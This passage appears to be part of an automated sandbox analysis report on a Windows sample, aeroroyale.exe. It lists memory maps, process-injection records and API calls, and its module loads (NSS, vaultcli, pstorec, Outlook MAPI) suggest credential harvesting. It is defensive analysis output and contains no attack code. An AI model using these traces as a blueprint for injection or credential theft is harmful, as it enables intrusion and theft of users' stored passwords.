| private_0x0000000001680000 | 0x01680000 | 0x016bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016c0000 | 0x016c0000 | 0x0189ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016c0000 | 0x016c0000 | 0x017bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001800000 | 0x01800000 | 0x0189ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000018a0000 | 0x018a0000 | 0x0209ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000018a0000 | 0x018a0000 | 0x01c92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x0219ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x02b9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002ba0000 | 0x02ba0000 | 0x02ca0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ba0000 | 0x02ba0000 | 0x02c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x0307ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x02f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x0307ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003080000 | 0x03080000 | 0x031fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003080000 | 0x03080000 | 0x0317ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000031f0000 | 0x031f0000 | 0x031fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003200000 | 0x03200000 | 0x039fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037170000 | 0x37170000 | 0x3717ffff | Private Memory | rwx |
|
|
|
- |
| mspst32.dll | 0x632e0000 | 0x63477fff | Memory Mapped File | rwx |
|
|
|
- |
| olmapi32.dll | 0x63480000 | 0x6384efff | Memory Mapped File | rwx |
|
|
|
- |
| mapir.dll | 0x64fa0000 | 0x650d3fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x65290000 | 0x6541dfff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x66500000 | 0x665b4fff | Memory Mapped File | rwx |
|
|
|
- |
| msadox.dll | 0x66700000 | 0x6675afff | Memory Mapped File | rwx |
|
|
|
- |
| msadox.dll | 0x66900000 | 0x6695afff | Memory Mapped File | rwx |
|
|
|
- |
| contab32.dll | 0x66a70000 | 0x66a92fff | Memory Mapped File | rwx |
|
|
|
- |
| davclnt.dll | 0x66b30000 | 0x66b46fff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x67300000 | 0x6bfeafff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x6bff0000 | 0x6d8d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x6ea60000 | 0x6edd0fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x6fd30000 | 0x6fd7efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x6fd80000 | 0x6fdd7fff | Memory Mapped File | rwx |
|
|
|
- |
| davhlpr.dll | 0x70250000 | 0x70257fff | Memory Mapped File | rwx |
|
|
|
- |
| osppc.dll | 0x70ac0000 | 0x70aecfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x70b80000 | 0x70c39fff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x716e0000 | 0x71bdffff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x71be0000 | 0x71e1ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x71e50000 | 0x71eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x71ec0000 | 0x71f7efff | Memory Mapped File | rwx |
|
|
|
- |
| msimg32.dll | 0x729a0000 | 0x729a4fff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x72fc0000 | 0x72ffbfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74030000 | 0x74054fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74370000 | 0x7437cfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x74660000 | 0x747effff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x758a0000 | 0x758a7fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x75950000 | 0x75978fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77660000 | 0x77754fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd34 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd34 | address = 0x7ffdc008, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd34 | os_tid = 0xd4c, address = 0x0 |
|
1 |
Threads
Thread 0xd4c
50
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-08-01 10:20:18 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x777b418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x777b1f61 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x777b1e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x777b76e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x777b3879 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x777624d8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x77792111 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x777a2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7779b009 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x778689be |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7785c02a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7785c0d2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x77793f78 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77868bfb |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7785b567 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77885998 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77852251 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x778528f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x77792004 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x777e9aa9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x777ef3cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x777bebc6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetDateFormatEx, address_out = 0x777ff29f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x777953a5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTimeFormatEx, address_out = 0x777ff21a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x777ef70b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsValidLocaleName, address_out = 0x777ef71b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x777ef72b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x7779eb4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 |
|
1 | |
| Module | Load | module_name = C:\PROGRA~1\MICROS~1\Office15\OLMAPI32.DLL, base_address = 0x63480000 |
|
1 | |
| File | Create | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp, desired_access = FILE_APPEND_DATA |
|
1 | |
| System | Get Time | type = Ticks, time = 262190 |
|
1 | |
| System | Get Time | type = Ticks, time = 262206 |
|
1 | |
| COM | Create | interface = 9240A6CD-AF41-11D2-8C3B-00104B2A6676, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp, size = 54 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll |
|
1 |
Process #11: aeroroyale.exe
277
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:03:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:36, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd50 |
| Parent PID | 0xc08 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D54
0x
D64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00250000 | 0x002b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x00387fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x003b0000 | 0x003ebfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| tzres.dll | 0x003b0000 | 0x003b0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0045afff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x0116ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001170000 | 0x01170000 | 0x0126ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01270000 | 0x0153efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x0163ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001640000 | 0x01640000 | 0x01740fff | Private Memory | rw |
|
|
|
- |
| nss3.dll | 0x01640000 | 0x017f1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001640000 | 0x01640000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001640000 | 0x01640000 | 0x01647fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001700000 | 0x01700000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001740000 | 0x01740000 | 0x0183ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001840000 | 0x01840000 | 0x0193ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001900000 | 0x01900000 | 0x019fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001a00000 | 0x01a00000 | 0x01df2fff | Pagefile Backed Memory | r |
|
|
|
- |
| nss3.dll | 0x63120000 | 0x632d4fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x665c0000 | 0x6667dfff | Memory Mapped File | rwx |
|
|
|
- |
| freebl3.dll | 0x666c0000 | 0x6670efff | Memory Mapped File | rwx |
|
|
|
- |
| freebl3.dll | 0x66710000 | 0x6675efff | Memory Mapped File | rwx |
|
|
|
- |
| softokn3.dll | 0x66930000 | 0x66956fff | Memory Mapped File | rwx |
|
|
|
- |
| nssdbm3.dll | 0x66940000 | 0x66956fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x669c0000 | 0x66a28fff | Memory Mapped File | rwx |
|
|
|
- |
| mozglue.dll | 0x66a30000 | 0x66a51fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x66a60000 | 0x66a66fff | Memory Mapped File | rwx |
|
|
|
- |
| softokn3.dll | 0x66a70000 | 0x66a96fff | Memory Mapped File | rwx |
|
|
|
- |
| nssdbm3.dll | 0x66a80000 | 0x66a96fff | Memory Mapped File | rwx |
|
|
|
- |
| vaultcli.dll | 0x66ae0000 | 0x66aebfff | Memory Mapped File | rwx |
|
|
|
- |
| pstorec.dll | 0x66b10000 | 0x66b1cfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x66b50000 | 0x66bd3fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x6f370000 | 0x6f3a1fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73d80000 | 0x73d93fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x76f60000 | 0x76f65fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x772e0000 | 0x7735afff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77660000 | 0x77754fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77980000 | 0x77984fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x77a30000 | 0x77a64fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd38 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd38 | address = 0x7ffda008, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd38 | os_tid = 0xd54, address = 0x0 |
|
1 |
Threads
Thread 0xd54
277
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x66b50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x66b56be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x760f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x76110468 |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale_lng.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
18 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
